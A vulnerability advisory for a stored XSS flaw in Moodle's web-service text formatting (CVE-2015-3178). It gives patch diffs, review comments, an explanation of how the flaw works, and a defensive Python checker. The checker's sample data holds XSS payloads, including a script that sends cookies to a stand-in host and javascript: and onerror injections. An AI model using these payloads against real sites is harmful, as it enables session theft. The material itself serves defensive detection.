CVE-2015-3178
Description
Cross-site scripting (XSS) vulnerability in the external_format_text function in lib/externallib.php in Moodle through 2.5.9, 2.6.x before 2.6.11, 2.7.x before 2.7.8, and 2.8.x before 2.8.6 allows remote authenticated users to inject arbitrary web script or HTML into an external application via a crafted string that is visible to web services.
Affected packages
Versions sourced from the GitHub Security Advisory (GHSA-9fmw-m4qx-6cq8), which covers only the then-supported 2.6, 2.7 and 2.8 branches. The NVD description above also lists every 2.5.x release through 2.5.9 as affected, and no patched 2.5 release exists; 2.5 installations have to move to a fixed branch rather than apply a point update.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| moodle/moodle | Packagist | < 2.6.11 | 2.6.11 |
| moodle/moodle | Packagist | >= 2.7.0, < 2.7.8 | 2.7.8 |
| moodle/moodle | Packagist | >= 2.8.0, < 2.8.6 | 2.8.6 |
Affected products
35 CPE entries:
- cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* (version range: <= 2.5.9)
- cpe:2.3:a:moodle:moodle:2.5.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.5:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.6:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.7:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.5.8:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.10:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.5:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.6:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.7:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.8:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.6.9:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.5:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.6:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.7.7:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.0:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.1:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.2:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.3:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.4:*:*:*:*:*:*:*
- cpe:2.3:a:moodle:moodle:2.8.5:*:*:*:*:*:*:*
Patches
Commit 2c7d13dba37a · MDL-49718 externallib: unittest correction
1 file changed · +4 −2
course/tests/externallib_test.php+4 −2 modified@@ -225,7 +225,8 @@ public function test_get_categories() { $generatedcat = $generatedcats[$category['id']]; $this->assertEquals($category['idnumber'], $generatedcat->idnumber); $this->assertEquals($category['name'], $generatedcat->name); - $this->assertEquals($category['description'], $generatedcat->description); + // Description was converted to the HTML format. + $this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($category['descriptionformat'], FORMAT_HTML); } @@ -530,7 +531,8 @@ public function test_get_courses () { $dbcourse = $generatedcourses[$course['id']]; $this->assertEquals($course['idnumber'], $dbcourse->idnumber); $this->assertEquals($course['fullname'], $dbcourse->fullname); - $this->assertEquals($course['summary'], $dbcourse->summary); + // Summary was converted to the HTML format. + $this->assertEquals($course['summary'], format_text($dbcourse->summary, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($course['summaryformat'], FORMAT_HTML); $this->assertEquals($course['shortname'], $dbcourse->shortname); $this->assertEquals($course['categoryid'], $dbcourse->category);
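Review bot: in both hunks the expected value is computed with the same format_text() call that the code under test now makes, so `$this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false)));` only proves that external_format_text() and format_text() agree, not that dangerous markup is removed; add a fixture whose description and summary contain a script tag and an on* attribute and assert that neither survives in $category['description'] / $course['summary']. The hardcoded FORMAT_MOODLE also assumes the generator's default descriptionformat/summaryformat; passing $generatedcat->descriptionformat and $dbcourse->summaryformat instead keeps the test honest if that default changes.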
Commit 7f5bd0da0e25 · MDL-49718 externallib: unittest correction
1 file changed · +4 −2
course/tests/externallib_test.php+4 −2 modified@@ -225,7 +225,8 @@ public function test_get_categories() { $generatedcat = $generatedcats[$category['id']]; $this->assertEquals($category['idnumber'], $generatedcat->idnumber); $this->assertEquals($category['name'], $generatedcat->name); - $this->assertEquals($category['description'], $generatedcat->description); + // Description was converted to the HTML format. + $this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($category['descriptionformat'], FORMAT_HTML); } @@ -531,7 +532,8 @@ public function test_get_courses () { $dbcourse = $generatedcourses[$course['id']]; $this->assertEquals($course['idnumber'], $dbcourse->idnumber); $this->assertEquals($course['fullname'], $dbcourse->fullname); - $this->assertEquals($course['summary'], $dbcourse->summary); + // Summary was converted to the HTML format. + $this->assertEquals($course['summary'], format_text($dbcourse->summary, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($course['summaryformat'], FORMAT_HTML); $this->assertEquals($course['shortname'], $dbcourse->shortname); $this->assertEquals($course['categoryid'], $dbcourse->category);
Commit b4da1e0ae4f6 · MDL-49718 externallib: unittest correction
1 file changed · +4 −2
course/tests/externallib_test.php+4 −2 modified@@ -225,7 +225,8 @@ public function test_get_categories() { $generatedcat = $generatedcats[$category['id']]; $this->assertEquals($category['idnumber'], $generatedcat->idnumber); $this->assertEquals($category['name'], $generatedcat->name); - $this->assertEquals($category['description'], $generatedcat->description); + // Description was converted to the HTML format. + $this->assertEquals($category['description'], format_text($generatedcat->description, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($category['descriptionformat'], FORMAT_HTML); } @@ -531,7 +532,8 @@ public function test_get_courses () { $dbcourse = $generatedcourses[$course['id']]; $this->assertEquals($course['idnumber'], $dbcourse->idnumber); $this->assertEquals($course['fullname'], $dbcourse->fullname); - $this->assertEquals($course['summary'], $dbcourse->summary); + // Summary was converted to the HTML format. + $this->assertEquals($course['summary'], format_text($dbcourse->summary, FORMAT_MOODLE, array('para' => false))); $this->assertEquals($course['summaryformat'], FORMAT_HTML); $this->assertEquals($course['shortname'], $dbcourse->shortname); $this->assertEquals($course['categoryid'], $dbcourse->category);
Commit 77067fbb3a24 · MDL-49718 webservices: Fix forced format and force external text cleaning
1 file changed · +3 −4
lib/externallib.php+3 −4 modified@@ -712,7 +712,7 @@ function external_validate_format($format) { * All web service servers must set this singleton when parsing the $_GET and $_POST. * * @param string $text The content that may contain ULRs in need of rewriting. - * @param int $textformat The text format, by default FORMAT_HTML. + * @param int $textformat The text format. * @param int $contextid This parameter and the next two identify the file area to use. * @param string $component * @param string $filearea helps identify the file area. @@ -732,9 +732,8 @@ function external_format_text($text, $textformat, $contextid, $component, $filea } if (!$settings->get_raw()) { - $textformat = FORMAT_HTML; // Force format to HTML when not raw. - $text = format_text($text, $textformat, - array('noclean' => true, 'para' => false, 'filter' => $settings->get_filter())); + $text = format_text($text, $textformat, array('para' => false, 'filter' => $settings->get_filter())); + $textformat = FORMAT_HTML; // Once converted to html (from markdown, plain... lets inform consumer this is already HTML). } return array($text, $textformat);
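Review bot: removing `'noclean' => true` and passing the caller's real $textformat is the cleaning fix, but the surrounding `if (!$settings->get_raw())` guard means the raw branch still returns $text exactly as stored, uncleaned and unconverted; the docblock edited in the first hunk should say so, since a consumer that requests raw output now has a different security contract from one that does not. While touching that docblock, the unchanged context line `@param string $text The content that may contain ULRs in need of rewriting.` has a typo ("ULRs"). The new comment `// Once converted to html (from markdown, plain... lets inform consumer this is already HTML).` should read "let's" and would be more useful if it stated the property consumers rely on: the value is now cleaned HTML, not merely HTML.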
Commit d62d36c657a5 · MDL-49718 webservices: Fix forced format and force external text cleaning
1 file changed · +3 −4
lib/externallib.php+3 −4 modified@@ -706,7 +706,7 @@ function external_validate_format($format) { * All web service servers must set this singleton when parsing the $_GET and $_POST. * * @param string $text The content that may contain ULRs in need of rewriting. - * @param int $textformat The text format, by default FORMAT_HTML. + * @param int $textformat The text format. * @param int $contextid This parameter and the next two identify the file area to use. * @param string $component * @param string $filearea helps identify the file area. @@ -726,9 +726,8 @@ function external_format_text($text, $textformat, $contextid, $component, $filea } if (!$settings->get_raw()) { - $textformat = FORMAT_HTML; // Force format to HTML when not raw. - $text = format_text($text, $textformat, - array('noclean' => true, 'para' => false, 'filter' => $settings->get_filter())); + $text = format_text($text, $textformat, array('para' => false, 'filter' => $settings->get_filter())); + $textformat = FORMAT_HTML; // Once converted to html (from markdown, plain... lets inform consumer this is already HTML). } return array($text, $textformat);
Commit 28947c1d7d9c · MDL-49718 webservices: Fix forced format and force external text cleaning
1 file changed · +3 −4
lib/externallib.php+3 −4 modified@@ -712,7 +712,7 @@ function external_validate_format($format) { * All web service servers must set this singleton when parsing the $_GET and $_POST. * * @param string $text The content that may contain ULRs in need of rewriting. - * @param int $textformat The text format, by default FORMAT_HTML. + * @param int $textformat The text format. * @param int $contextid This parameter and the next two identify the file area to use. * @param string $component * @param string $filearea helps identify the file area. @@ -732,9 +732,8 @@ function external_format_text($text, $textformat, $contextid, $component, $filea } if (!$settings->get_raw()) { - $textformat = FORMAT_HTML; // Force format to HTML when not raw. - $text = format_text($text, $textformat, - array('noclean' => true, 'para' => false, 'filter' => $settings->get_filter())); + $text = format_text($text, $textformat, array('para' => false, 'filter' => $settings->get_filter())); + $textformat = FORMAT_HTML; // Once converted to html (from markdown, plain... lets inform consumer this is already HTML). } return array($text, $textformat);
Vulnerability mechanics
Before the fix, external_format_text() in lib/externallib.php handled every non-raw web-service text field by overwriting its declared format with FORMAT_HTML and then calling format_text() with 'noclean' => true. Two things followed. Text stored as plain text, Markdown or Moodle auto-format was treated as HTML instead of being escaped or converted, so a literal script tag typed into a plain-text field was passed through as markup. And because cleaning was disabled, even genuine HTML content skipped the HTML cleaner that format_text() normally applies. Any authenticated user able to write to a field that web services expose (the test patches cover course summaries and category descriptions) could therefore store active markup and have it delivered verbatim, labelled as HTML, to every external consumer (mobile apps, portals and other web-service clients) that renders the field; the XSS fires in the consumer, not in Moodle's own pages. The fix (MDL-49718) calls format_text() with the text's real format and without 'noclean', so plain text is escaped, Markdown is rendered and the resulting HTML is cleaned, and only then reports FORMAT_HTML to the consumer. The raw branch, taken when the consumer asks for raw output, is unchanged by the patch: such consumers still receive the stored source uncleaned and must sanitise it themselves.
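As an added example (not Moodle's code, and not the fix itself), the following Python script performs the consumer-side check that this CVE calls for: it takes a web-service response, pairs each text field with its format companion, and flags values the server labels FORMAT_HTML (meaning "render as-is") that still carry script-capable markup. The responses are constructed to look like core_course_get_courses output. Moodle's format constants (FORMAT_MOODLE=0, FORMAT_HTML=1, FORMAT_PLAIN=2, FORMAT_MARKDOWN=4) and the summary/summaryformat and description/descriptionformat pairs come from Moodle; the function names, the tag and attribute lists and the sample values are the example's own.

```python
"""Consumer-side check for uncleaned HTML in Moodle web-service output.

Added example, not Moodle code. Flags text that the server labelled
FORMAT_HTML but that still contains script-capable markup, which is what an
unpatched external_format_text() produced for CVE-2015-3178.
"""
from html.parser import HTMLParser

# Moodle's text format constants (lib/weblib.php).
FORMAT_MOODLE, FORMAT_HTML, FORMAT_PLAIN, FORMAT_MARKDOWN = 0, 1, 2, 4

# Example's own lists: elements, attributes and URL schemes that can run script.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
               "style", "link", "meta", "base", "form"}
URL_ATTRS = {"href", "src", "action", "formaction", "data", "xlink:href"}
ACTIVE_SCHEMES = ("javascript:", "vbscript:", "data:")


class ActiveMarkupFinder(HTMLParser):
    """Records every script-capable construct seen while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and value:
                # Browsers ignore whitespace/control characters inside the
                # scheme ("java\tscript:"), so strip them before comparing.
                scheme = "".join(ch for ch in value if ch > " ").lower()
                if scheme.startswith(ACTIVE_SCHEMES):
                    self.findings.append(f"{name}={value!r} on <{tag}>")


def find_active_markup(html_text):
    """Return descriptions of script-capable constructs in html_text.

    Entity-escaped markup (&lt;script&gt;) is character data, not a tag, and
    is not reported: that is what a patched server returns for a
    FORMAT_PLAIN source.
    """
    finder = ActiveMarkupFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


# Field/format pairs that external_format_text() emits for these functions.
TEXT_FIELDS = {
    "core_course_get_courses": [("summary", "summaryformat")],
    "core_course_get_categories": [("description", "descriptionformat")],
}


def audit_response(wsfunction, records):
    """Flag records whose FORMAT_HTML text would run script when rendered."""
    hits = []
    for rec in records:
        for textkey, fmtkey in TEXT_FIELDS[wsfunction]:
            if rec.get(fmtkey) != FORMAT_HTML:
                continue  # consumer is expected to escape/convert, not render raw
            findings = find_active_markup(rec.get(textkey, ""))
            if findings:
                hits.append({"id": rec["id"], "field": textkey, "findings": findings})
    return hits


# Constructed responses shaped like core_course_get_courses output.
# UNPATCHED_SAMPLE is what a vulnerable server hands back for summaries a
# teacher stored as plain text or HTML: active content, labelled as HTML.
UNPATCHED_SAMPLE = [
    {"id": 2, "shortname": "sec101", "summaryformat": FORMAT_HTML,
     "summary": "<p>Intro</p><script>fetch('//evil.example/?c='+document.cookie)</script>"},
    {"id": 3, "shortname": "sec102", "summaryformat": FORMAT_HTML,
     "summary": "<a href=\"java\tscript:alert(1)\">syllabus</a>"},
    {"id": 4, "shortname": "sec103", "summaryformat": FORMAT_HTML,
     "summary": "<img src=x onerror=alert(1)> week 1"},
]
# PATCHED_SAMPLE is the same data after the fix: plain text escaped, HTML
# cleaned, still labelled FORMAT_HTML but inert.
PATCHED_SAMPLE = [
    {"id": 2, "shortname": "sec101", "summaryformat": FORMAT_HTML,
     "summary": "<p>Intro</p>"},
    {"id": 3, "shortname": "sec102", "summaryformat": FORMAT_HTML,
     "summary": "<a>syllabus</a>"},
    {"id": 4, "shortname": "sec103", "summaryformat": FORMAT_HTML,
     "summary": "&lt;img src=x onerror=alert(1)&gt; week 1"},
]

if __name__ == "__main__":
    for label, sample in (("unpatched", UNPATCHED_SAMPLE), ("patched", PATCHED_SAMPLE)):
        hits = audit_response("core_course_get_courses", sample)
        print(f"{label}: {len(hits)} suspicious field(s)")
        for hit in hits:
            print("  ", hit)
```

To run this against a live site, replace the constructed lists with the decoded JSON from a real call to the web-service function (REST: `wsfunction=core_course_get_courses` with a token of an ordinary user); a patched server should produce no hits for any payload an authenticated user can store, and a single hit on an upgraded site points at a consumer that requested raw output and is doing no cleaning of its own.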
References
- github.com/advisories/GHSA-9fmw-m4qx-6cq8 (GitHub Security Advisory)
- moodle.org/mod/forum/discuss.php (vendor advisory, via NVD)
- nvd.nist.gov/vuln/detail/CVE-2015-3178 (NVD entry, via GHSA)
- openwall.com/lists/oss-security/2015/05/18/1 (oss-security announcement, via NVD)
- github.com/moodle/moodle/commit/28947c1d7d9c53781989b9da7ceb2cafdd144749 (fix commit, via GHSA)
- github.com/moodle/moodle/commit/2c7d13dba37aa0c850c62037b951efd6dc1b0f78 (unit test correction, via GHSA)
- github.com/moodle/moodle/commit/77067fbb3a248ac2f1fa4b3c20e5b81f768940e5 (fix commit, via GHSA)
- github.com/moodle/moodle/commit/7f5bd0da0e25feb3b6da3908b6672a58af82e12f (unit test correction, via GHSA)
- github.com/moodle/moodle/commit/b4da1e0ae4f63ef0bb14b8bf5c0b86cd00f2af4b (unit test correction, via GHSA)
- github.com/moodle/moodle/commit/d62d36c657a5df45ee286722490abb7901381da6 (fix commit, via GHSA)
- web.archive.org/web/20200228054910/http://www.securityfocus.com/bid/74726 (SecurityFocus BID 74726, archived copy, via GHSA)
- web.archive.org/web/20201201000000*/http://www.securitytracker.com/id/1032358 (SecurityTracker 1032358, archived copy, via GHSA)
- www.securityfocus.com/bid/74726 (SecurityFocus BID 74726, via NVD)
- www.securitytracker.com/id/1032358 (SecurityTracker 1032358, via NVD)